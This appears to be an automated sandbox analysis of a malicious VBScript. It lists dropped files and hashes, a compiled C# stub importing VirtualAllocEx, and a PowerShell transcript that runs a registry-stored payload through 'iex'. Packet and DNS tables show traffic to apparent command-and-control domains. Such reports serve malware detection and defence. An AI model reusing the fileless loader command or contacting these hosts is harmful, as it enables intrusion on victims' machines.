                                                                                                                                          Preview: .using System;.using System.Runtime.InteropServices;..namespace W32.{. public class mme. {. [DllImport("kernel32")].public static extern IntPtr GetCurrentProcess();.[DllImport("kernel32")].public static extern void SleepEx(uint bxtqajkpwb,uint ytemv);.[DllImport("kernel32")].public static extern IntPtr VirtualAllocEx(IntPtr nlosdxjodm,IntPtr mvqodpevph,uint tnvcegcf,uint dbt,uint egycoak);.. }..}.
                                                                                                                                          C:\Users\user\AppData\Local\Temp\gf33rpcq\gf33rpcq.cmdline
                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):369
                                                                                                                                          Entropy (8bit):5.26776679395388
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2WXp+N23fV0zxs7+AEszIWXp+N23fVBH:p37Lvkmb6KHN0WZE89x
                                                                                                                                          MD5:FD0B0CC56616B812680C09A0B74E77DE
                                                                                                                                          SHA1:420FE1CDD255AC4A2EB364A0277D4DAFB9C4F899
                                                                                                                                          SHA-256:BA9974638D15489B3AF70C4DF3B7EC1CC1EB349B5CB7A207379BA9C9F0AC480E
                                                                                                                                          SHA-512:1F5C6E504A8265C83BF79EDF97670058973A654CF243E21F63341B6550696A7BC4BE0640FFFACB015D7646E4E107C897E83008FCA764918FD19A669D7DF7E3DC
                                                                                                                                          Malicious:false
                                                                                                                                          Preview: ./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\gf33rpcq\gf33rpcq.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\gf33rpcq\gf33rpcq.0.cs"
                                                                                                                                          C:\Users\user\AppData\Local\Temp\gf33rpcq\gf33rpcq.dll
                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):3584
                                                                                                                                          Entropy (8bit):2.633045662526388
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24:etGS5M+WEei8MTx2qHtLUyBridWtGYwxhtkZfcAkEw7I+ycuZhNbakSdPNnq:6v7qMTxzJUyNcWQYwSJ/kV1ulba3Hq
                                                                                                                                          MD5:BFDEB38C6C2A8513E6C35152D37EEE6A
                                                                                                                                          SHA1:AB5BD941BDA2C18557F30C7074A03B10AE0C5169
                                                                                                                                          SHA-256:7803760A5BB01CEE5BCA26B70218E9AA5EDEDB8707230D9524EDCD9C786D7B03
                                                                                                                                          SHA-512:AEF5B59DEFC9BAB93ABE13975A8DA44BA83FE9D191E152A213939FEB2EACA0DBDDE2005AEC02D7DCAD4158A49A2473A8E671617B4ABF89DB4330C15CB66779F4
                                                                                                                                          Malicious:false
                                                                                                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Z6._...........!.................$... ...@....... ....................................@..................................#..W....@.......................`....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B..................(....*BSJB............v4.0.30319......l...P...#~......D...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................/.(...............'...................................... 6............ H............ P.....P ......_.........e.....p.....v..........................._.!..._...!._.&..._.......+.....4.:.....6.......H.......P..................................................<Module>.gf33rpcq.dll.mme.W32.mscor
C:\Users\user\AppData\Local\Temp\gf33rpcq\gf33rpcq.out
Process: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type: ASCII text, with CRLF, CR line terminators
Category: modified
Size (bytes): 412
Entropy (8bit): 4.871364761010112
Encrypted: false
SSDEEP: 12:zKaMK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:zKaM5DqBVKVrdFAMBJTH
MD5: 83B3C9D9190CE2C57B83EEE13A9719DF
SHA1: ABFAB07DEA88AF5D3AF75970E119FE44F43FE19E
SHA-256: B5D219E5143716023566DD71C0195F41F32C3E7F30F24345E1708C391DEEEFDA
SHA-512: 0DE42AC5924B8A8E977C1330E9D7151E9DCBB1892A038C1815321927DA3DB804EC13B129196B6BC84C7BFC9367C1571FCD128CCB0645EAC7418E39A91BC2FEDB
Malicious: false
Preview: Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
C:\Users\user\AppData\Local\Temp\~DF59ED155C1D1CCF51.TMP
Process: C:\Program Files\internet explorer\iexplore.exe
File Type: data
Category: dropped
Size (bytes): 13269
Entropy (8bit): 0.6174234412588923
Encrypted: false
SSDEEP: 24:c9lLh9lLh9lIn9lIn9loB3F9loBV9lWB0eaWg5eapMs494Jb4EvrbakXhrbE:kBqoIUKKjpA4N9i
MD5: 3D6CA1B2D638D71DF821F140E465FEF8
SHA1: 819DC1E7616B6E6C184E4E889FD785BAD34EEFED
SHA-256: 5BEA8B499AEF03F3E5C9C1E1FE563EADA0E41017FAE731C3C0E88AE0230E5EB5
SHA-512: E78CEF408D76BD9E58EAC6AFE96387F429A9DDC178ED0A826188C2ACAF3CDF1414D54AAF67CDD3D1F8E0C69580012564B49D392CC59BCEF0CFF1A53AD58EFC65
Malicious: false
Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
C:\Users\user\AppData\Local\Temp\~DFB0CD04804313B9D1.TMP
Process: C:\Program Files\internet explorer\iexplore.exe
File Type: data
Category: dropped
Size (bytes): 40169
Entropy (8bit): 0.6745163349269476
Encrypted: false
SSDEEP: 48:kBqoxKAuvScS+357yGIGZMMYSGATRMMYSGAT6MMYSGATP:kBqoxKAuvScS+357yZQHRTRHRT6HRTP
MD5: 5F5949031A52E085626731F0151DF3AC
SHA1: 5AD1CA223F657D1550DF058AD9E9949FBAFCEF40
SHA-256: 00077CD4B9E9AD4FB3FCF05A09A5B40D3B6974C933C2EA282501D25797626F32
SHA-512: 603F4672028219703A3507AB435F17EF7B17BB2279DB876A00291D779D4C104848C9104AF79C4F0D2D3BD6E374A596AEE7D2A9CD70AEDA26E5E980A8DDD9DB3F
Malicious: false
Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
C:\Users\user\AppData\Local\Temp\~DFCC0C7DB5ED67DF9E.TMP
Process: C:\Program Files\internet explorer\iexplore.exe
File Type: data
Category: dropped
Size (bytes): 40065
Entropy (8bit): 0.6541737361432745
Encrypted: false
SSDEEP: 96:kBqoxKAuvScS+357yZ6fiKcreUfiKcreliKcrem:kBqoxKAuqR+357yZ8iKcS+iKcSliKcSm
MD5: F12BBB69FC8854476283F4EE3AF68272
SHA1: CBA61EFC5193514E604B7771D9AD53A0F95B548E
SHA-256: 2D572B00B2399ACCC0249106EFDFBD97070C148176BE46841C5BC0A9BA3CDA6B
SHA-512: 6BB6BDE3AF21FB54DF92EB93900D543BDFFDD8045E24701397699F537199D77A864444EDDBE38118726680F4C565E867246227FD9636F5A3BC76CBC143F49675
Malicious: false
Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
C:\Users\user\AppData\Local\Temp\~DFD893D4E6D1758C04.TMP
Process: C:\Program Files\internet explorer\iexplore.exe
File Type: data
Category: dropped
Size (bytes): 40201
Entropy (8bit): 0.6810153704098243
Encrypted: false
SSDEEP: 96:kBqoxKAuvScS+TtfW98o/zJxxo/zJxKo/zJx/:kBqoxKAuqR+TtfW98YzJxxYzJxKYzJx/
MD5: F33F2E1CB450AD4D1BB9BEB148FDCB78
SHA1: 76D5A9B19F0A4712E8DBD46C26006D049F336FCE
SHA-256: 623808588AFDEC44D9FBD8528AEE3D4D43951FDBCBCA0CCBB35215F33A1709EC
SHA-512: 259C50BAE0086E69B5622727E33D223B472A0288EA4CB7976ECE99CBDF82C18CD7796C09F887C229B035A7F92272D550D14EF933DBCB2BDA1D3D41E88BFB91D0
Malicious: false
Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
C:\Users\user\AppData\Roaming\Microsoft\{FC666F93-2B96-8EB5-95F0-8FA2992433F6}
Process: C:\Windows\explorer.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 54
Entropy (8bit): 4.152970956533509
Encrypted: false
SSDEEP: 3:yc3uW+5R+FXddBWD1UEPv:yKu14IDeEX
MD5: 891BDB4EA9E04B9B5981E9065FFE41B4
SHA1: 2B880F4EE99E581B0A3BA955CFF93870192F14B0
SHA-256: 5F707C4CBEA96AABDE09290B98303E1F7EF946B6800A113CA8F885B1B2CE0F00
SHA-512: 641C0AA4082EBF08A6701F955310CC6F67B720D364DC482FDF57F95FC5A72926571A1B24CC92D638DF72B006374DA2F916356BCD0A662FF2D5AD8AB4A96C996B
Malicious: false
Preview: 20-11-2020 13:34:47 | "0xb88d3fdf_5fa2c4f12d12f" | 1..
C:\Users\user\Documents\20201120\PowerShell_transcript.284992.umVzyGW1.20201120133403.txt
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category: dropped
Size (bytes): 1189
Entropy (8bit): 5.32288493808506
Encrypted: false
SSDEEP: 24:BxSA85xvBnUx2DOXUWOLCHGIYBtLW4HjeTKKjX4CIym1ZJX2OLCHGIYBtunxSAZL:BZ8LvhUoORF/4qDYB1ZcFFZZL
MD5: C6B372195B2E3D82BEDC0C1BC82564E1
SHA1: 037A5A173991B6302BC68EB01D743C120001B2B1
SHA-256: A75ADB161AB9C41B7F9E9297B4921F137DD49CB7BBFD7F7A4F5FE4EF2CCA9DFE
SHA-512: 0502A68172023A8368325D06D76ACD6E40D0920AC086951FC2A0A53BCCD35214F8D19A66658741D9C0446A9B05ADDBABDC843242E123FF72496A9E3434A69CFD
Malicious: false
Preview: .**********************..Windows PowerShell transcript start..Start time: 20201120133403..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 284992 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe iex ([System.Text.Encoding]::ASCII.GetString(( gp HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550).basebapi))..Process ID: 6356..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20201120133403..**********************..PS>iex ([System.Text.Encoding]::ASCII.GetString(( gp HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550).basebapi))..**********************..

Static File Info

General

File type: ASCII text, with very long lines, with CRLF, LF line terminators
Entropy (8bit): 4.287126159723977
TrID:
  File name: 0k4Vu1eOEIhU.vbs
  File size: 373044
  MD5: a3ba204668130312404ae877445921c1
  SHA1: 65f172cb351f3bf1b51b24ecf837dd1dab1731e0
  SHA256: c16c0ad19dc1f015c92f3232a1eaa069b71f99695331a12a67a650c4c7bdbf75
  SHA512: 33d5e238a71204d2ace1c780020cff113b6f304a6471b9cfba7bb0f5f2f175b804015cf573bf8c247406fef6f179d50a4c5b73f9012b7a271a9d249b7b483a31
  SSDEEP: 3072:VDRp0xBRYkxWblq7iQh6qDkLBPUdgyaHoJr6fpkJHe:hqRBxIl4P6qoL5Ud/PJOfpkJHe
  File Content Preview: ' Alberich Greek martial temptress presto babe, Semite rueful re fairway Estes Steinberg paratroop finesse Bangladesh authenticate allusive grapevine scattergun late, tugging gorgon Bateman inexplicable. swingy bitumen Coriolanus foreign Osaka indivisible

File Icon

Icon Hash: e8d69ece869a9ec4

Network Behavior

Network Port Distribution

TCP Packets

Timestamp                            Source Port  Dest Port  Source IP      Dest IP
Nov 20, 2020 13:33:44.729579926 CET  49731        80         192.168.2.3    47.241.19.44
Nov 20, 2020 13:33:44.729674101 CET  49732        80         192.168.2.3    47.241.19.44
Nov 20, 2020 13:33:44.981605053 CET  80           49731      47.241.19.44   192.168.2.3
Nov 20, 2020 13:33:44.981772900 CET  49731        80         192.168.2.3    47.241.19.44
Nov 20, 2020 13:33:44.982534885 CET  49731        80         192.168.2.3    47.241.19.44
Nov 20, 2020 13:33:44.987214088 CET  80           49732      47.241.19.44   192.168.2.3
Nov 20, 2020 13:33:44.987327099 CET  49732        80         192.168.2.3    47.241.19.44
Nov 20, 2020 13:33:45.276060104 CET  80           49731      47.241.19.44   192.168.2.3
Nov 20, 2020 13:33:45.971455097 CET  80           49731      47.241.19.44   192.168.2.3
Nov 20, 2020 13:33:45.971508980 CET  80           49731      47.241.19.44   192.168.2.3
Nov 20, 2020 13:33:45.971546888 CET  80           49731      47.241.19.44   192.168.2.3
Nov 20, 2020 13:33:45.971545935 CET  49731        80         192.168.2.3    47.241.19.44
Nov 20, 2020 13:33:45.971575022 CET  49731        80         192.168.2.3    47.241.19.44
Nov 20, 2020 13:33:45.971585989 CET  80           49731      47.241.19.44   192.168.2.3
Nov 20, 2020 13:33:45.971590996 CET  49731        80         192.168.2.3    47.241.19.44
Nov 20, 2020 13:33:45.971625090 CET  80           49731      47.241.19.44   192.168.2.3
Nov 20, 2020 13:33:45.971647978 CET  49731        80         192.168.2.3    47.241.19.44
Nov 20, 2020 13:33:45.971662045 CET  80           49731      47.241.19.44   192.168.2.3
Nov 20, 2020 13:33:45.971671104 CET  49731        80         192.168.2.3    47.241.19.44
Nov 20, 2020 13:33:45.971714020 CET  49731        80         192.168.2.3    47.241.19.44
Nov 20, 2020 13:33:46.014738083 CET  80           49731      47.241.19.44   192.168.2.3
Nov 20, 2020 13:33:46.014792919 CET  80           49731      47.241.19.44   192.168.2.3
Nov 20, 2020 13:33:46.014818907 CET  49731        80         192.168.2.3    47.241.19.44
Nov 20, 2020 13:33:46.014837027 CET  49731        80         192.168.2.3    47.241.19.44
Nov 20, 2020 13:33:46.014842033 CET  80           49731      47.241.19.44   192.168.2.3
Nov 20, 2020 13:33:46.014884949 CET  49731        80         192.168.2.3    47.241.19.44
Nov 20, 2020 13:33:46.014894009 CET  80           49731      47.241.19.44   192.168.2.3
Nov 20, 2020 13:33:46.014941931 CET  49731        80         192.168.2.3    47.241.19.44
Nov 20, 2020 13:33:46.223750114 CET  80           49731      47.241.19.44   192.168.2.3
Nov 20, 2020 13:33:46.223829031 CET  80           49731      47.241.19.44   192.168.2.3
Nov 20, 2020 13:33:46.223860025 CET  49731        80         192.168.2.3    47.241.19.44
Nov 20, 2020 13:33:46.223887920 CET  80           49731      47.241.19.44   192.168.2.3
Nov 20, 2020 13:33:46.223928928 CET  80           49731      47.241.19.44   192.168.2.3
Nov 20, 2020 13:33:46.223928928 CET  49731        80         192.168.2.3    47.241.19.44
Nov 20, 2020 13:33:46.223968983 CET  80           49731      47.241.19.44   192.168.2.3
                                                                                                                                            Nov 20, 2020 13:33:46.223994017 CET4973180192.168.2.347.241.19.44
                                                                                                                                            Nov 20, 2020 13:33:46.224006891 CET804973147.241.19.44192.168.2.3
                                                                                                                                            Nov 20, 2020 13:33:46.224015951 CET4973180192.168.2.347.241.19.44
                                                                                                                                            Nov 20, 2020 13:33:46.224045992 CET804973147.241.19.44192.168.2.3
                                                                                                                                            Nov 20, 2020 13:33:46.224061966 CET4973180192.168.2.347.241.19.44
                                                                                                                                            Nov 20, 2020 13:33:46.224093914 CET804973147.241.19.44192.168.2.3
                                                                                                                                            Nov 20, 2020 13:33:46.224137068 CET804973147.241.19.44192.168.2.3
                                                                                                                                            Nov 20, 2020 13:33:46.224144936 CET4973180192.168.2.347.241.19.44
                                                                                                                                            Nov 20, 2020 13:33:46.224174023 CET804973147.241.19.44192.168.2.3
                                                                                                                                            Nov 20, 2020 13:33:46.224210024 CET4973180192.168.2.347.241.19.44
                                                                                                                                            Nov 20, 2020 13:33:46.224212885 CET804973147.241.19.44192.168.2.3
                                                                                                                                            Nov 20, 2020 13:33:46.224225044 CET4973180192.168.2.347.241.19.44
                                                                                                                                            Nov 20, 2020 13:33:46.224251986 CET804973147.241.19.44192.168.2.3
                                                                                                                                            Nov 20, 2020 13:33:46.224277973 CET4973180192.168.2.347.241.19.44
                                                                                                                                            Nov 20, 2020 13:33:46.224301100 CET4973180192.168.2.347.241.19.44
                                                                                                                                            Nov 20, 2020 13:33:46.266976118 CET804973147.241.19.44192.168.2.3
                                                                                                                                            Nov 20, 2020 13:33:46.267034054 CET804973147.241.19.44192.168.2.3
                                                                                                                                            Nov 20, 2020 13:33:46.267065048 CET4973180192.168.2.347.241.19.44
                                                                                                                                            Nov 20, 2020 13:33:46.267071962 CET804973147.241.19.44192.168.2.3
                                                                                                                                            Nov 20, 2020 13:33:46.267093897 CET4973180192.168.2.347.241.19.44
                                                                                                                                            Nov 20, 2020 13:33:46.267117023 CET4973180192.168.2.347.241.19.44
                                                                                                                                            Nov 20, 2020 13:33:46.267121077 CET804973147.241.19.44192.168.2.3
                                                                                                                                            Nov 20, 2020 13:33:46.267163038 CET804973147.241.19.44192.168.2.3
                                                                                                                                            Nov 20, 2020 13:33:46.267200947 CET804973147.241.19.44192.168.2.3
                                                                                                                                            Nov 20, 2020 13:33:46.267206907 CET4973180192.168.2.347.241.19.44
                                                                                                                                            Nov 20, 2020 13:33:46.267240047 CET804973147.241.19.44192.168.2.3
                                                                                                                                            Nov 20, 2020 13:33:46.267266035 CET4973180192.168.2.347.241.19.44
                                                                                                                                            Nov 20, 2020 13:33:46.267278910 CET804973147.241.19.44192.168.2.3
                                                                                                                                            Nov 20, 2020 13:33:46.267285109 CET4973180192.168.2.347.241.19.44
                                                                                                                                            Nov 20, 2020 13:33:46.267846107 CET4973180192.168.2.347.241.19.44
                                                                                                                                            Nov 20, 2020 13:33:46.476352930 CET804973147.241.19.44192.168.2.3
                                                                                                                                            Nov 20, 2020 13:33:46.476411104 CET804973147.241.19.44192.168.2.3
                                                                                                                                            Nov 20, 2020 13:33:46.476450920 CET804973147.241.19.44192.168.2.3
                                                                                                                                            Nov 20, 2020 13:33:46.476473093 CET4973180192.168.2.347.241.19.44
                                                                                                                                            Nov 20, 2020 13:33:46.476489067 CET804973147.241.19.44192.168.2.3
                                                                                                                                            Nov 20, 2020 13:33:46.476497889 CET4973180192.168.2.347.241.19.44
                                                                                                                                            Nov 20, 2020 13:33:46.476527929 CET804973147.241.19.44192.168.2.3
                                                                                                                                            Nov 20, 2020 13:33:46.476567030 CET804973147.241.19.44192.168.2.3
                                                                                                                                            Nov 20, 2020 13:33:46.476588964 CET4973180192.168.2.347.241.19.44
                                                                                                                                            Nov 20, 2020 13:33:46.476602077 CET4973180192.168.2.347.241.19.44
                                                                                                                                            Nov 20, 2020 13:33:46.476605892 CET804973147.241.19.44192.168.2.3
                                                                                                                                            Nov 20, 2020 13:33:46.476650953 CET4973180192.168.2.347.241.19.44
                                                                                                                                            Nov 20, 2020 13:33:46.476653099 CET804973147.241.19.44192.168.2.3
                                                                                                                                            Nov 20, 2020 13:33:46.476697922 CET804973147.241.19.44192.168.2.3
                                                                                                                                            Nov 20, 2020 13:33:46.476737022 CET804973147.241.19.44192.168.2.3
                                                                                                                                            Nov 20, 2020 13:33:46.476742029 CET4973180192.168.2.347.241.19.44
                                                                                                                                            Nov 20, 2020 13:33:46.476774931 CET804973147.241.19.44192.168.2.3
                                                                                                                                            Nov 20, 2020 13:33:46.476815939 CET804973147.241.19.44192.168.2.3
                                                                                                                                            Nov 20, 2020 13:33:46.476829052 CET4973180192.168.2.347.241.19.44
                                                                                                                                            Nov 20, 2020 13:33:46.476852894 CET804973147.241.19.44192.168.2.3
                                                                                                                                            Nov 20, 2020 13:33:46.476891994 CET804973147.241.19.44192.168.2.3
                                                                                                                                            Nov 20, 2020 13:33:46.476891994 CET4973180192.168.2.347.241.19.44
                                                                                                                                            Nov 20, 2020 13:33:46.476900101 CET4973180192.168.2.347.241.19.44
                                                                                                                                            Nov 20, 2020 13:33:46.476931095 CET804973147.241.19.44192.168.2.3
                                                                                                                                            Nov 20, 2020 13:33:46.476943970 CET4973180192.168.2.347.241.19.44
                                                                                                                                            Nov 20, 2020 13:33:46.476979017 CET804973147.241.19.44192.168.2.3
                                                                                                                                            Nov 20, 2020 13:33:46.477008104 CET4973180192.168.2.347.241.19.44
                                                                                                                                            Nov 20, 2020 13:33:46.477021933 CET804973147.241.19.44192.168.2.3
                                                                                                                                            Nov 20, 2020 13:33:46.477022886 CET4973180192.168.2.347.241.19.44
                                                                                                                                            Nov 20, 2020 13:33:46.477060080 CET804973147.241.19.44192.168.2.3
                                                                                                                                            Nov 20, 2020 13:33:46.477097988 CET804973147.241.19.44192.168.2.3
                                                                                                                                            Nov 20, 2020 13:33:46.477135897 CET804973147.241.19.44192.168.2.3
                                                                                                                                            Nov 20, 2020 13:33:46.477173090 CET804973147.241.19.44192.168.2.3
                                                                                                                                            Nov 20, 2020 13:33:46.477174044 CET4973180192.168.2.347.241.19.44
                                                                                                                                            Nov 20, 2020 13:33:46.477200031 CET4973180192.168.2.347.241.19.44

UDP Packets

Timestamp                             Source Port  Dest Port  Source IP      Dest IP
Nov 20, 2020 13:33:13.831291914 CET   58361        53         192.168.2.3    8.8.8.8
Nov 20, 2020 13:33:13.858442068 CET   53           58361      8.8.8.8        192.168.2.3
Nov 20, 2020 13:33:16.928622961 CET   63492        53         192.168.2.3    8.8.8.8
Nov 20, 2020 13:33:16.955749989 CET   53           63492      8.8.8.8        192.168.2.3
Nov 20, 2020 13:33:18.182957888 CET   60831        53         192.168.2.3    8.8.8.8
Nov 20, 2020 13:33:18.210057974 CET   53           60831      8.8.8.8        192.168.2.3
Nov 20, 2020 13:33:19.253458023 CET   60100        53         192.168.2.3    8.8.8.8
Nov 20, 2020 13:33:19.280782938 CET   53           60100      8.8.8.8        192.168.2.3
Nov 20, 2020 13:33:20.061245918 CET   53195        53         192.168.2.3    8.8.8.8
Nov 20, 2020 13:33:20.088474035 CET   53           53195      8.8.8.8        192.168.2.3
Nov 20, 2020 13:33:20.860735893 CET   50141        53         192.168.2.3    8.8.8.8
Nov 20, 2020 13:33:20.887850046 CET   53           50141      8.8.8.8        192.168.2.3
Nov 20, 2020 13:33:21.685347080 CET   53023        53         192.168.2.3    8.8.8.8
Nov 20, 2020 13:33:21.712531090 CET   53           53023      8.8.8.8        192.168.2.3
Nov 20, 2020 13:33:22.521199942 CET   49563        53         192.168.2.3    8.8.8.8
Nov 20, 2020 13:33:22.548346043 CET   53           49563      8.8.8.8        192.168.2.3
Nov 20, 2020 13:33:23.296860933 CET   51352        53         192.168.2.3    8.8.8.8
Nov 20, 2020 13:33:23.324100971 CET   53           51352      8.8.8.8        192.168.2.3
Nov 20, 2020 13:33:24.942857981 CET   59349        53         192.168.2.3    8.8.8.8
Nov 20, 2020 13:33:24.969974995 CET   53           59349      8.8.8.8        192.168.2.3
Nov 20, 2020 13:33:25.810091972 CET   57084        53         192.168.2.3    8.8.8.8
Nov 20, 2020 13:33:25.837268114 CET   53           57084      8.8.8.8        192.168.2.3
Nov 20, 2020 13:33:39.228127003 CET   58823        53         192.168.2.3    8.8.8.8
Nov 20, 2020 13:33:39.255470037 CET   53           58823      8.8.8.8        192.168.2.3
Nov 20, 2020 13:33:40.181142092 CET   57568        53         192.168.2.3    8.8.8.8
Nov 20, 2020 13:33:40.208467007 CET   53           57568      8.8.8.8        192.168.2.3
Nov 20, 2020 13:33:41.000368118 CET   50540        53         192.168.2.3    8.8.8.8
Nov 20, 2020 13:33:41.028100967 CET   53           50540      8.8.8.8        192.168.2.3
Nov 20, 2020 13:33:43.571583033 CET   54366        53         192.168.2.3    8.8.8.8
Nov 20, 2020 13:33:43.608565092 CET   53           54366      8.8.8.8        192.168.2.3
Nov 20, 2020 13:33:44.615875959 CET   53034        53         192.168.2.3    8.8.8.8
Nov 20, 2020 13:33:44.660775900 CET   53           53034      8.8.8.8        192.168.2.3
Nov 20, 2020 13:33:44.679397106 CET   57762        53         192.168.2.3    8.8.8.8
Nov 20, 2020 13:33:44.715097904 CET   53           57762      8.8.8.8        192.168.2.3
Nov 20, 2020 13:33:48.288885117 CET   55435        53         192.168.2.3    8.8.8.8
Nov 20, 2020 13:33:48.315965891 CET   53           55435      8.8.8.8        192.168.2.3
Nov 20, 2020 13:33:48.894037008 CET   50713        53         192.168.2.3    8.8.8.8
Nov 20, 2020 13:33:48.929748058 CET   53           50713      8.8.8.8        192.168.2.3
Nov 20, 2020 13:33:52.509083986 CET   56132        53         192.168.2.3    8.8.8.8
Nov 20, 2020 13:33:52.537138939 CET   53           56132      8.8.8.8        192.168.2.3
Nov 20, 2020 13:33:55.127355099 CET   58987        53         192.168.2.3    8.8.8.8
Nov 20, 2020 13:33:55.162821054 CET   53           58987      8.8.8.8        192.168.2.3
Nov 20, 2020 13:33:56.573421955 CET   56579        53         192.168.2.3    8.8.8.8
Nov 20, 2020 13:33:56.609309912 CET   53           56579      8.8.8.8        192.168.2.3
Nov 20, 2020 13:34:02.306252956 CET   60633        53         192.168.2.3    8.8.8.8
Nov 20, 2020 13:34:02.333309889 CET   53           60633      8.8.8.8        192.168.2.3
Nov 20, 2020 13:34:03.142594099 CET   61292        53         192.168.2.3    8.8.8.8
Nov 20, 2020 13:34:03.182229996 CET   53           61292      8.8.8.8        192.168.2.3
Nov 20, 2020 13:34:05.689238071 CET   63619        53         192.168.2.3    8.8.8.8
Nov 20, 2020 13:34:05.716586113 CET   53           63619      8.8.8.8        192.168.2.3
Nov 20, 2020 13:34:10.795291901 CET   64938        53         192.168.2.3    8.8.8.8
Nov 20, 2020 13:34:10.831927061 CET   53           64938      8.8.8.8        192.168.2.3
Nov 20, 2020 13:34:13.551425934 CET   61946        53         192.168.2.3    8.8.8.8
Nov 20, 2020 13:34:13.587361097 CET   53           61946      8.8.8.8        192.168.2.3
Nov 20, 2020 13:34:14.542453051 CET   61946        53         192.168.2.3    8.8.8.8
Nov 20, 2020 13:34:14.580282927 CET   53           61946      8.8.8.8        192.168.2.3
Nov 20, 2020 13:34:15.558326006 CET   61946        53         192.168.2.3    8.8.8.8
Nov 20, 2020 13:34:15.596432924 CET   53           61946      8.8.8.8        192.168.2.3
Nov 20, 2020 13:34:17.573200941 CET   61946        53         192.168.2.3    8.8.8.8
Nov 20, 2020 13:34:17.600239992 CET   53           61946      8.8.8.8        192.168.2.3
Nov 20, 2020 13:34:21.592626095 CET   61946        53         192.168.2.3    8.8.8.8
Nov 20, 2020 13:34:21.638942957 CET   53           61946      8.8.8.8        192.168.2.3
Nov 20, 2020 13:34:41.898040056 CET   64910        53         192.168.2.3    8.8.8.8
Nov 20, 2020 13:34:41.933887005 CET   53           64910      8.8.8.8        192.168.2.3
Nov 20, 2020 13:34:44.676477909 CET   52123        53         192.168.2.3    8.8.8.8
Nov 20, 2020 13:34:44.703452110 CET   53           52123      8.8.8.8        192.168.2.3
Nov 20, 2020 13:34:45.133925915 CET   56130        53         192.168.2.3    8.8.8.8
Nov 20, 2020 13:34:45.169461012 CET   53           56130      8.8.8.8        192.168.2.3
Nov 20, 2020 13:34:45.174135923 CET   56338        53         192.168.2.3    8.8.8.8
Nov 20, 2020 13:34:45.201183081 CET   53           56338      8.8.8.8        192.168.2.3
Nov 20, 2020 13:34:45.617145061 CET   59420        53         192.168.2.3    8.8.8.8
Nov 20, 2020 13:34:45.644351959 CET   53           59420      8.8.8.8        192.168.2.3
Nov 20, 2020 13:34:46.772273064 CET   58784        53         192.168.2.3    8.8.8.8
Nov 20, 2020 13:34:46.810003996 CET   53           58784      8.8.8.8        192.168.2.3
Nov 20, 2020 13:35:03.369529009 CET   63978        53         192.168.2.3    8.8.8.8
Nov 20, 2020 13:35:03.396821022 CET   53           63978      8.8.8.8        192.168.2.3

DNS Queries

Timestamp                             Source IP     Dest IP   Trans ID  OP Code             Name                   Type             Class
Nov 20, 2020 13:33:44.679397106 CET   192.168.2.3   8.8.8.8   0xbdb4    Standard query (0)  api10.laptok.at        A (IP address)   IN (0x0001)
Nov 20, 2020 13:33:48.894037008 CET   192.168.2.3   8.8.8.8   0xe1a7    Standard query (0)  api10.laptok.at        A (IP address)   IN (0x0001)
Nov 20, 2020 13:33:55.127355099 CET   192.168.2.3   8.8.8.8   0x3d08    Standard query (0)  api10.laptok.at        A (IP address)   IN (0x0001)
Nov 20, 2020 13:34:41.898040056 CET   192.168.2.3   8.8.8.8   0xd102    Standard query (0)  c56.lepini.at          A (IP address)   IN (0x0001)
Nov 20, 2020 13:34:44.676477909 CET   192.168.2.3   8.8.8.8   0x7ce6    Standard query (0)  resolver1.opendns.com  A (IP address)   IN (0x0001)
